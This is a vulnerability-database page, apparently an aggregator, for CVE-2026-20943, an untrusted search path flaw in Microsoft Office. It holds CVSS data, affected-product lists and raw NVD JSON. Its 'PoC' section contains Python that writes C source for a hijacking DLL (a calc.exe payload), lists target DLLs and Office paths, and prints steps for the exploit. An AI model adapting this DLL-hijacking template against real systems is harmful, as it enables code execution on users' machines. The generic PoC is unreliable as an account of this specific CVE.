Security Vulnerability Report
中文
CVE-2026-20943 CVSS 7.0 HIGH

CVE-2026-20943

Published: 2026-01-13 18:16:22
Last Modified: 2026-01-16 16:14:35
Source: [email protected]

Description

Untrusted search path in Microsoft Office allows an unauthorized attacker to execute code locally.

CVSS Details

CVSS Score
7.0
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:x64:* - VULNERABLE
cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:x86:* - VULNERABLE
cpe:2.3:a:microsoft:office_deployment_tool:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:subscription:*:*:* - VULNERABLE
cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:enterprise:*:*:* - VULNERABLE
Microsoft Office 2016 及更早版本
Microsoft Office 2019
Microsoft Office 2021
Microsoft 365 Apps

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2026-20943 PoC - DLL Search Path Hijacking # This PoC demonstrates the DLL search order hijacking technique # for exploiting untrusted search path vulnerability in Microsoft Office import os import ctypes import shutil import sys # Malicious DLL source code (for demonstration purposes) MALICIOUS_DLL_C = ''' #include <windows.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Execute malicious payload WinExec("calc.exe", SW_SHOWNORMAL); // Write to log file for verification FILE *f = fopen("C:\\\\temp\\\\cve_poc_log.txt", "a"); if (f) { fprintf(f, "[+] CVE-2026-20943 exploited at %s\\n", __TIMESTAMP__); fclose(f); } } return TRUE; } ''' def create_malicious_dll(dll_path): """Create a malicious DLL that will be loaded by Office""" with open(dll_path.replace('.dll', '.c'), 'w') as f: f.write(MALICIOUS_DLL_C) print(f"[+] Source code written to {dll_path.replace('.dll', '.c')}") print("[*] Compile with: gcc -shared -o malicious.dll malicious.c") def check_vulnerable_dlls(): """Check common DLLs that might be hijacked""" common_dlls = [ "riched20.dll", "riched32.dll", "msxml.dll", "shdocvw.dll", "urlmon.dll", "iexplore.exe" ] # Check if running in Office installation directory office_paths = [ os.path.join(os.environ.get('ProgramFiles', ''), 'Microsoft Office'), os.path.join(os.environ.get('ProgramFiles(x86)', ''), 'Microsoft Office'), os.environ.get('USERPROFILE', '') + '\\AppData\\Local\\Microsoft\\Office' ] return office_paths def main(): print("=" * 60) print("CVE-2026-20943 - Microsoft Office DLL Search Path Hijacking") print("=" * 60) # Step 1: Identify target DLL target_dll = "riched20.dll" print(f"\n[*] Target DLL: {target_dll}") # Step 2: Create malicious DLL dll_path = os.path.join(os.getcwd(), target_dll) create_malicious_dll(dll_path) # Step 3: Display exploitation steps print("\n[!] Exploitation Steps:") print("1. Place malicious DLL in Office search path") print("2. User opens any Office application (Word, Excel, PowerPoint)") print("3. Office loads the malicious DLL instead of the legitimate one") print("4. Malicious code executes with user's privileges") print("\n[*] This is a proof-of-concept for educational purposes only.") print("[*] Use only in authorized security testing environments.") if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-20943", "sourceIdentifier": "[email protected]", "published": "2026-01-13T18:16:21.687", "lastModified": "2026-01-16T16:14:34.970", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Untrusted search path in Microsoft Office allows an unauthorized attacker to execute code locally."}, {"lang": "es", "value": "Ruta de búsqueda no confiable en Microsoft Office permite a un atacante no autorizado ejecutar código localmente."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:x64:*", "matchCriteriaId": "72324216-4EB3-4243-A007-FEF3133C7DF9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office:2016:*:*:*:*:*:x86:*", "matchCriteriaId": "0FBB0E61-7997-4F26-9C07-54912D3F1C10"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:office_deployment_tool:*:*:*:*:*:*:*:*", "versionEndExcluding": "16.0.19426.20170", "matchCriteriaId": "2D4CAEAF-A5AF-46D2-9A2B-8B04CC120B04"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sharepoint_server:*:*:*:*:subscription:*:*:*", "versionEndExcluding": "16.0.19127.20442", "matchCriteriaId": "FB9ECA81-C1E2-4B02-A45C-0E5664E3C9B9"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sharepoint_server:2016:*:*:*:enterprise:*:*:*", "matchCriteriaId": "F815EF1D-7B60-47BE-9AC2-2548F99F10E4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:sharepoint_server:2019:*:*:*:*:*:*:*", "matchCriteriaId": "6122D014-5BF1-4AF4-8B4D-80205ED7785E"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-20943", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.